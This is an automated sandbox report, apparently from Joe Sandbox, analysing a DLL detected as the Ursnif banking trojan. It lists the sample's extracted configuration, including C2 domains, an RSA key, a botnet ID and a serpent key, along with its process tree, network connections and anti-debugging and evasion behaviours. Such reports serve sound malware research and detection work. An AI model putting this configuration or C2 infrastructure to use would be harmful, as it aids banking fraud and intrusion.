Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name: 616412739e268.dll
Analysis ID: 500413
MD5: 9e67e68ddbedba865b91b5469ab642ef
SHA1: f2c7b0735343081be06e48616d0fc14235a28744
SHA256: 41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags: brt, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7036 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7040 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7052 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1364 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |

Unpacked PEs

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 4.3.rundll32.exe.8aa31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| 2.3.rundll32.exe.322a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| 5.3.rundll32.exe.2eca31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| 5.3.rundll32.exe.2eca31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |
| 3.3.rundll32.exe.342a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (configuration identical to the one listed under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: 616412739e268.dll, ReversingLabs: Detection: 24%
Multi AV Scanner detection for domain / URL
Source: areuranel.website, Virustotal: Detection: 6%
Source: breuranel.website, Virustotal: Detection: 6%
Source: 616412739e268.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 616412739e268.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll

                      Networking:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.97.218.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.97.137.210 187
                      Source: Joe Sandbox View, ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox View, IP Address: 40.97.153.146
                      Source: Joe Sandbox View, IP Address: 13.82.28.61
                      Source: unknown, DNS traffic detected: queries for: msn.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D13B8 GetProcAddress,NtCreateSection,memset,0_2_6E2D13B8
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D1273 NtMapViewOfSection,0_2_6E2D1273
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E2D15C6
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D23D5 NtQueryVirtualMemory,0_2_6E2D23D5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04CD5D10
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDB149 NtQueryVirtualMemory,3_2_04CDB149
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04975D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04975D10
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0497B149 NtQueryVirtualMemory,5_2_0497B149
                      Source: 616412739e268.dll ReversingLabs: Detection: 24%
                      Source: 616412739e268.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmp
                      Source: classification engine Classification label: mal96.troj.evad.winDLL@14/12@24/10
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CD4A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_04CD4A03
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6464
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                      Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
                      Source: 616412739e268.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D21A3 push ecx; ret 0_2_6E2D21B3
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D2150 push ecx; ret 0_2_6E2D2159
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E30AB9A push ecx; ret 0_2_6E30ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDABE0 push ecx; ret 3_2_04CDABE9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDAF13 push ecx; ret 3_2_04CDAF23
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E30AB9A push ecx; ret 3_2_6E30ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0497ABE0 push ecx; ret 5_2_0497ABE9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0497AF13 push ecx; ret 5_2_0497AF23
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress, 0_2_6E2D1DE5

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: WerFault.exe, 0000000C.00000003.926283769.00000000048B6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWm32\advapi32.dll
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.902665043.0000000004560000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.938125643.0000000005307000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 0000000F.00000003.936044986.0000000005307000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E316CB3
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,0_2_6E2D1DE5
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E32C325 mov eax, dword ptr fs:[00000030h] 0_2_6E32C325
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E338861 mov eax, dword ptr fs:[00000030h] 0_2_6E338861
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E37DFDA mov eax, dword ptr fs:[00000030h] 0_2_6E37DFDA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E37DEAA mov eax, dword ptr fs:[00000030h] 0_2_6E37DEAA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E37DBB5 push dword ptr fs:[00000030h] 0_2_6E37DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E32C325 mov eax, dword ptr fs:[00000030h] 3_2_6E32C325
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E338861 mov eax, dword ptr fs:[00000030h] 3_2_6E338861
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E37DFDA mov eax, dword ptr fs:[00000030h] 3_2_6E37DFDA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E37DEAA mov eax, dword ptr fs:[00000030h] 3_2_6E37DEAA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E37DBB5 push dword ptr fs:[00000030h] 3_2_6E37DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E316CB3
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E30B316
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E316CB3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E30B316

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.218.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.137.210 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6E330E4C
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6E309EB5
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6E330429
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6E33E448
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6E33EA21
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6E33E344
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6E33E3AD
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E33E84C
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6E33E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,3_2_6E330E4C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,3_2_6E309EB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,3_2_6E330429
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,3_2_6E33E448
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6E33EA21
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,3_2_6E33E344
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,3_2_6E33E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E33E84C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6E33E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDA82B cpuid 3_2_04CDA82B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E2D1172
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E32FF15 _free,_free,_free,GetTimeZoneInformation,_free,0_2_6E32FF15
